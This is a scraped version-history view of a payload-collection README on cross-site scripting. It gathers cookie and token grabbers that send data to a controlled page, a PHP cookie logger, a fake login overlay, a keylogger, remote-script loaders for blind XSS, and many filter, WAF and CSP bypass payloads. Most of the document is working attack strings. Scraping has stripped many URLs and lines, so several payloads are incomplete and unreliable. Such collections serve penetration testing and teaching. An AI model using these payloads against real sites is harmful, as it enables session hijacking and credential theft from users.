PayloadsAllTheThings/XSS Injection/

1133 lines
44 KiB
Raw Normal View History

2016-10-19 16:39:07 +00:00
# Cross Site Scripting
2018-08-12 21:30:22 +00:00
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
2016-10-18 08:01:56 +00:00
## Summary
2018-08-12 21:30:22 +00:00
- [Exploit code or POC](#exploit-code-or-poc)
- [Data grabber for XSS](#data-grabber-for-xss)
- [UI redressing](#ui-redressing)
- [Javascript keylogger](#javascript-keylogger)
- [Other ways](#other-ways)
2018-08-12 21:30:22 +00:00
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
2020-05-06 18:27:55 +00:00
- [XSS in HTML/Applications](#xss-in-llapplications)
2018-08-12 21:30:22 +00:00
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
2019-08-03 21:22:14 +00:00
- [XSS in PostMessage](#xss-in-postmessage)
- [Blind XSS](#blind-xss)
- [XSS Hunter](#xss-hunter)
- [Other Blind XSS tools](#other-blind-xss-tools)
- [Blind XSS endpoint](#blind-xss-endpoint)
2019-11-06 17:32:29 +00:00
- [Mutated XSS](#mutated-xss)
2018-08-12 21:30:22 +00:00
- [Polyglot XSS](#polyglot-xss)
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
- [Bypass case sensitive](#bypass-case-sensitive)
- [Bypass tag blacklist](#bypass-tag-blacklist)
- [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation)
- [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag)
- [Bypass quotes for string](#bypass-quotes-for-string)
- [Bypass quotes in script tag](#bypass-quotes-in-script-tag)
- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
- [Bypass dot filter](#bypass-dot-filter)
- [Bypass parenthesis for string](#bypass-parenthesis-for-string)
- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
- [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist)
- [Bypass space filter](#bypass-space-filter)
- [Bypass email filter](#bypass-email-filter)
- [Bypass document blacklist](#bypass-document-blacklist)
- [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string)
- [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect)
- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
- [Bypass ">" using nothing](#bypass----using-nothing)
- [Bypass ";" using another character](#bypass-using------using-another-character)
- [Bypass using HTML encoding](#bypass-using-html-encoding)
- [Bypass using Katana](#bypass-using-katana)
- [Bypass using Lontara](#bypass-using-lontara)
- [Bypass using ECMAScript6](#bypass-using-ecmascript6)
- [Bypass using Octal encoding](#bypass-using-octal-encoding)
- [Bypass using Unicode](#bypass-using-unicode)
- [Bypass using UTF-7](#bypass-using-utf---7)
- [Bypass using UTF-8](#bypass-using-utf---8)
- [Bypass using UTF-16be](#bypass-using-utf---16be)
- [Bypass using UTF-32](#bypass-using-utf---32)
- [Bypass using BOM](#bypass-using-bom)
- [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation)
- [CSP Bypass](#csp-bypass)
2019-03-04 18:40:34 +00:00
- [Common WAF Bypass](#common-waf-bypass)
2018-03-23 12:53:53 +00:00
2016-10-19 16:39:07 +00:00
## Exploit code or POC
2016-10-18 08:01:56 +00:00
### Data grabber for XSS
2018-08-12 21:30:22 +00:00
Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.
2018-10-31 21:34:10 +00:00
2018-10-31 21:34:10 +00:00
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>
2016-10-19 16:39:07 +00:00
Write the collected data into a file.
2016-10-19 16:39:07 +00:00
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
### UI redressing
Leverage the XSS to modify the HTML content of the page in order to display a fake login form.
history.replaceState(null, null, '../../../login');
document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
### Javascript keylogger
Another way to collect sensitive data is to set a javascript keylogger.
2018-08-12 21:30:22 +00:00
2018-08-13 11:07:37 +00:00
2017-07-30 11:17:00 +00:00
<img src=x onerror='document.onkeypress=function(e){fetch(""+String.fromCharCode(e.which))},this.remove();'>
### Other ways
2018-03-25 21:51:22 +00:00
More exploits at [](
2018-08-12 21:30:22 +00:00
- [Taking screenshots using XSS and the HTML5 Canvas](
- [JavaScript Port Scanner](
- [Network Scanner](
- [.NET Shell execution](
- [Redirect Form](
- [Play Music](
2018-03-25 21:51:22 +00:00
2017-10-21 14:48:17 +00:00
## Identify an XSS endpoint
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2017-10-21 14:48:17 +00:00
## XSS in HTML/Applications
2018-08-12 21:30:22 +00:00
2016-10-19 16:39:07 +00:00
XSS Basic
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-10-19 16:39:07 +00:00
Basic payload
Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
2016-10-19 16:39:07 +00:00
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
Svg payload
<svg onload=alert(1)>
<svg onload=alert(1)//
2016-10-19 16:39:07 +00:00
<svg id=alert(1) onload=eval(id)>
2020-05-06 18:27:55 +00:00
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
2019-08-01 12:39:15 +00:00
Div payload
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
2016-10-19 16:39:07 +00:00
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
<body onload=alert(/XSS/.source)>
2016-10-19 16:39:07 +00:00
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
2018-10-18 15:32:01 +00:00
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)> // Triggers when a finger touch the screen
<body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)> // When a finger is dragged across the screen.
2016-10-19 16:39:07 +00:00
XSS using script tag (external payload)
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2018-07-31 09:02:38 +00:00
you can also specify an arbitratry payload with
2016-10-19 16:39:07 +00:00
2016-10-20 23:12:00 +00:00
XSS in Hidden input
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-10-20 23:12:00 +00:00
<input type="hidden" accesskey="X" onclick="alert(1)">
Use CTRL+SHIFT+X to trigger the onclick event
2016-10-19 16:39:07 +00:00
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
#"><img src=/ onerror=alert(2)>
XSS in JS Context (payload without quote/double quote from [@brutelogic](
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
; alert(1);//
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
URL/<svg onload=alert(1)>
URL/<input autofocus onfocus=alert(1)>
2016-11-11 09:03:35 +00:00
## XSS in wrappers javascript and data URI
2018-08-12 21:30:22 +00:00
2016-10-19 16:39:07 +00:00
XSS with javascript:
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-10-19 16:39:07 +00:00
2016-11-17 03:50:34 +00:00
We can encode the "javacript:" in Hex/Octal
We can use a 'newline character'
java%0ascript:alert(1) - LF (\n)
java%09script:alert(1) - Horizontal tab (\t)
java%0dscript:alert(1) - CR (\r)
Using the escape character
2018-06-27 18:00:17 +00:00
2016-11-17 03:50:34 +00:00
2016-12-03 18:03:59 +00:00
Using the newline and a comment //
2016-10-19 16:39:07 +00:00
XSS with data:
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-11-11 09:03:35 +00:00
2016-10-19 16:39:07 +00:00
2018-02-23 12:48:51 +00:00
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
2016-10-19 16:39:07 +00:00
2016-12-03 18:03:59 +00:00
XSS with vbscript: only IE
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-12-03 18:03:59 +00:00
2018-08-12 21:30:22 +00:00
2016-10-19 16:39:07 +00:00
## XSS in files
2018-08-12 21:30:22 +00:00
** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2019-08-03 21:22:14 +00:00
### XSS in XML
2018-06-27 18:00:17 +00:00
2016-10-19 16:39:07 +00:00
<something:script xmlns:something="">alert(1)</something:script>
2019-08-03 21:22:14 +00:00
### XSS in SVG
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-10-19 16:39:07 +00:00
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">
<svg version="1.1" baseProfile="full" xmlns="">
2018-08-13 10:01:13 +00:00
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
2016-10-19 16:39:07 +00:00
2019-08-03 21:22:14 +00:00
### XSS in SVG (short)
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-10-19 16:39:07 +00:00
<svg xmlns="" onload="alert(document.domain)"/>
2017-11-19 13:01:36 +00:00
2016-10-19 16:39:07 +00:00
2019-08-03 21:22:14 +00:00
### XSS in Markdown
[a](j a v a s c r i p t:prompt(document.cookie))
2019-08-03 21:22:14 +00:00
### XSS in SWF flash application
2018-08-12 21:30:22 +00:00
Browsers other than IE:;
2016-10-19 16:39:07 +00:00
2018-08-12 21:30:22 +00:00
more payloads in ./files
2016-10-19 16:39:07 +00:00
2019-08-03 21:22:14 +00:00
### XSS in SWF flash application
2018-08-12 21:30:22 +00:00
2018-08-13 11:07:37 +00:00
2018-02-23 12:48:51 +00:00
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src=""/></a>&.swf
2019-08-03 21:22:14 +00:00
### XSS in CSS
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2018-03-23 12:53:53 +00:00
<!DOCTYPE html>
2016-10-31 07:55:37 +00:00
2018-03-23 12:53:53 +00:00
div {
background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
background-color: #cccccc;
2016-10-31 07:55:37 +00:00
2018-03-23 12:53:53 +00:00
2016-10-31 07:55:37 +00:00
2019-08-03 21:22:14 +00:00
## XSS in PostMessage
> If the target origin is asterisk * the message can be sent to any domain has reference to the child page.
<input type=button value="Click Me" id="btn">
document.getElementById('btn').onclick = function(e){
window.poc ='');
"sender": "accounts",
"url": "javascript:confirm('XSS')",
}, 2000);
## Blind XSS
### XSS Hunter
Available at [](
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
"><script src=//></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);"GET", "//");a.send();</script>
### Other Blind XSS tools
- [sleepy-puppy - Netflix](
- [bXSS - LewisArdern](
- [BlueLotus_XSSReceiver - FiresunCN](
- [ezXSS - ssl](
### Blind XSS endpoint
- Contact forms
- Ticket support
- Referer Header
- Custom Site Analytics
- Administrative Panel logs
- User Agent
- Custom Site Analytics
- Administrative Panel logs
- Comment Box
- Administrative Panel
2019-11-06 17:32:29 +00:00
## Mutated XSS
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.
Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at and
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
2016-10-19 16:39:07 +00:00
## Polyglot XSS
2018-08-12 21:30:22 +00:00
2016-10-19 16:39:07 +00:00
Polyglot XSS - 0xsobky
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-10-19 16:39:07 +00:00
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Polyglot XSS - Ashar Javed
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2018-08-13 11:07:37 +00:00
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script><isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //">
2016-10-19 16:39:07 +00:00
Polyglot XSS - Mathias Karlsson
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
2016-10-19 16:39:07 +00:00
Polyglot XSS - Rsnake
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
Polyglot XSS - Daniel Miessler
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
“ onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script><isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
2016-10-19 16:39:07 +00:00
2018-02-23 12:48:51 +00:00
Polyglot XSS - [@s0md3v](
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2018-02-23 12:48:51 +00:00
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
2018-08-12 21:30:22 +00:00
2018-02-23 12:48:51 +00:00
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2018-02-23 12:48:51 +00:00
Polyglot XSS - from [@filedescriptor's Polyglot Challenge](
# by crlf
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
# by europa
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>
# by EdOverflow
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
# by h1/ragnar
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
2016-10-19 16:39:07 +00:00
## Filter Bypass and exotic payloads
2016-10-20 23:12:00 +00:00
### Bypass case sensitive
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-11-11 09:03:35 +00:00
### Bypass tag blacklist
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
<script x>
<script x>alert('XSS')<script y>
### Bypass word blacklist with code evaluation
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
new Function`al\ert\`6\``;
2018-06-27 18:00:17 +00:00
### Bypass with incomplete html tag
Works on IE/Firefox/Chrome/Safari
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
<img src='1' onerror='alert(0)' <
### Bypass quotes for string
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-10-20 23:12:00 +00:00
### Bypass quotes in script tag
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2017-01-21 14:38:47 +00:00
<?php echo 'foo="text '.$_GET['test'].'";';`?>
### Bypass quotes in mousedown event
You can bypass a single quote with &#39; in an on mousedown event handler
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
### Bypass dot filter
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-11-11 09:03:35 +00:00
2019-08-28 17:56:55 +00:00
Convert IP address into decimal format: IE. `` == `http://3232235777`
### Bypass parenthesis for string
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-10-24 17:15:10 +00:00
2018-08-13 11:07:37 +00:00
2016-10-24 17:15:10 +00:00
2016-10-20 23:12:00 +00:00
### Bypass parenthesis and semi colon
// From @garethheyes
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>
// From @terjanq
// From @cgvwzq
<script> ='=/',0[onerror=eval]['/-alert(1)//']</script>
### Bypass onxxxx= blacklist
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
// Bypass onxxx= filter with a null byte/vertical tab
2016-11-11 09:03:35 +00:00
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />
2018-08-12 21:30:22 +00:00
// Bypass onxxx= filter with a '/'
2016-11-11 09:03:35 +00:00
<img src='1' onerror/=alert(0) />
### Bypass space filter
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
// Bypass space filter with "/"
2016-11-11 09:03:35 +00:00
// Bypass space filter with 0x0c/^L
2018-03-23 12:53:53 +00:00
<svg onload = alert(1) >
$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <
00000010: 6572 7428 3129 0c3e 0a ert(1).>.
### Bypass email filter
([RFC compliant](
### Bypass document blacklist
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
2017-01-07 19:51:47 +00:00
### Bypass using javascript inside a string
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2017-01-07 19:51:47 +00:00
foo="text </script><script>alert(1)</script>";
### Bypass using an alternate way to redirect
2018-08-12 21:30:22 +00:00
document.location = ""
### Bypass using an alternate way to execute an alert
From [@brutelogic]( tweet.
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2018-02-23 12:48:51 +00:00
2017-08-07 15:52:36 +00:00
2018-02-23 12:48:51 +00:00
2016-11-11 09:03:35 +00:00
From [@theMiddle]( - Using global variables
The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**.
c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; }
// 5
Then calling alert is :
// "alert"
self[Object.keys(self)[5]]("1") // alert("1")
We can find "alert" with a regular expression like ^a[rel]+t$ :
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a()
// then you can use a() with Object.keys
self[Object.keys(self)[a()]]("1") // alert("1")
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
From [@quanyang]( tweet.
2018-12-29 12:05:29 +00:00
From [@404death]( tweet.
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
new Function`al\ert\`6\``;
2018-08-13 11:07:37 +00:00
2018-06-27 18:00:17 +00:00
2017-01-21 14:38:47 +00:00
2018-06-27 18:00:17 +00:00
Bypass using an alternate way to trigger an alert
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2017-01-21 14:38:47 +00:00
var i = document.createElement("iframe");
i.onload = function(){
// Bypassed security
XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
var proxy = obj[name];
obj[name] = function () {
2018-08-13 10:01:13 +00:00
if (exec_original) {
return proxy.apply(this, arguments);
2017-01-21 14:38:47 +00:00
XSSObject.lockdown(obj, name);
2018-08-13 10:01:13 +00:00
2017-01-21 14:38:47 +00:00
XSSObject.proxy(window, 'alert', 'window.alert', false);
### Bypass ">" using nothing
You don't need to close your tags.
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
<svg onload=alert(1)//
2017-01-21 14:38:47 +00:00
### Bypass ";" using another character
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-12-20 18:46:06 +00:00
'te' * alert('*') * 'xt';
'te' / alert('/') / 'xt';
'te' % alert('%') % 'xt';
'te' - alert('-') - 'xt';
'te' + alert('+') + 'xt';
'te' ^ alert('^') ^ 'xt';
'te' > alert('>') > 'xt';
'te' < alert('<') < 'xt';
'te' == alert('==') == 'xt';
'te' & alert('&') & 'xt';
'te' , alert(',') , 'xt';
'te' | alert('|') | 'xt';
'te' ? alert('ifelsesh') : 'xt';
'te' in alert('in') in 'xt';
'te' instanceof alert('instanceof') instanceof 'xt';
### Bypass using HTML encoding
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2019-09-26 18:41:01 +00:00
></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
### Bypass using Katana
Using the [Katakana]( library.
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
### Bypass using Lontara
More alphabets on
### Bypass using ECMAScript6
### Bypass using Octal encoding
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
### Bypass using Unicode
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-10-19 16:39:07 +00:00
Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
transformed into U+003C LESS­THAN SIGN (<)
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
transformed into U+003C LESS­THAN SIGN (<)
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
E.g :
%EF%BC%9E becomes >
%EF%BC%9C becomes <
2016-11-11 09:03:35 +00:00
2016-10-20 23:12:00 +00:00
Bypass using Unicode converted to uppercase
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2017-01-21 14:38:47 +00:00
İ (%c4%b0).toLowerCase() => i
ı (%c4%b1).toUpperCase() => I
ſ (%c5%bf) .toUpperCase() => S
(%E2%84%AA).toLowerCase() => k
<ſvg onload=... > become <SVG ONLOAD=...>
2017-01-21 14:38:47 +00:00
<ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=>
### Bypass using UTF-7
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
### Bypass using UTF-8
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-10-20 23:12:00 +00:00
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
" = %CA%BA
' = %CA%B9
### Bypass using UTF-16be
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
### Bypass using UTF-32
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
### Bypass using BOM
Byte Order Mark (The page must begin with the BOM character.)
BOM character allows you to override charset of the page
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
BOM Character for UTF-16 Encoding:
Big Endian : 0xFE 0xFF
Little Endian : 0xFF 0xFE
XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E
BOM Character for UTF-32 Encoding:
Big Endian : 0x00 0x00 0xFE 0xFF
Little Endian : 0xFF 0xFE 0x00 0x00
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
### Bypass using weird encoding or native interpretation
2018-08-12 21:30:22 +00:00
2016-10-20 23:12:00 +00:00
2016-11-11 09:03:35 +00:00
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
2016-10-20 23:12:00 +00:00
2016-10-19 16:39:07 +00:00
2018-09-01 13:36:33 +00:00
## CSP Bypass
2020-05-10 08:32:51 +00:00
Check the CSP on []( and the post : [How to use Googles CSP Evaluator to bypass CSP](
2018-09-01 13:36:33 +00:00
### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](
More JSONP endpoints available in [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
2018-09-01 13:38:57 +00:00
### Bypass CSP by [](
2018-09-01 13:36:33 +00:00
Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here]("iframe"%29;"pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;)
### Bypass CSP by [Rhynorater](
2018-09-01 13:36:33 +00:00
2018-09-06 18:28:30 +00:00
### Bypass CSP by [@akita_zen](
Works for CSP like `script-src self`
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
### Bypass CSP by [@404death](
Works for CSP like `script-src 'self' data:`
<script ?/src="data:+,\u0061lert%281%29">/</script>
2018-06-27 18:00:17 +00:00
## Common WAF Bypass
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](
#### 21st april 2020
#### 22nd august 2019
#### 5th jule 2019
#### 3rd june 2019
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)
2019-03-01 16:49:19 +00:00
### Cloudflare XSS Bypass - 27th february 2018
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
2019-01-10 21:36:30 +00:00
### Chrome Auditor - 9th august 2018
2018-08-12 21:30:22 +00:00
2018-08-12 21:30:22 +00:00
Live example by @brutelogic - [](</script><svg><script>alert(1)-%26apos%3B)
2019-01-10 21:36:30 +00:00
### Incapsula WAF Bypass by [@Alra3ees]( 8th march 2018
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
2016-11-11 09:03:35 +00:00
2019-01-10 21:36:30 +00:00
### Incapsula WAF Bypass by [@c0d3G33k]( - 11th september 2018
2018-09-21 16:44:32 +00:00
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
### Incapsula WAF Bypass by [@daveysec]( - 11th may 2019
<svg onload\r\n=$.globalEval("al"+"ert()");>
2019-01-10 21:36:30 +00:00
### Akamai WAF Bypass by [@zseano]( - 18th june 2018
2018-08-12 21:30:22 +00:00
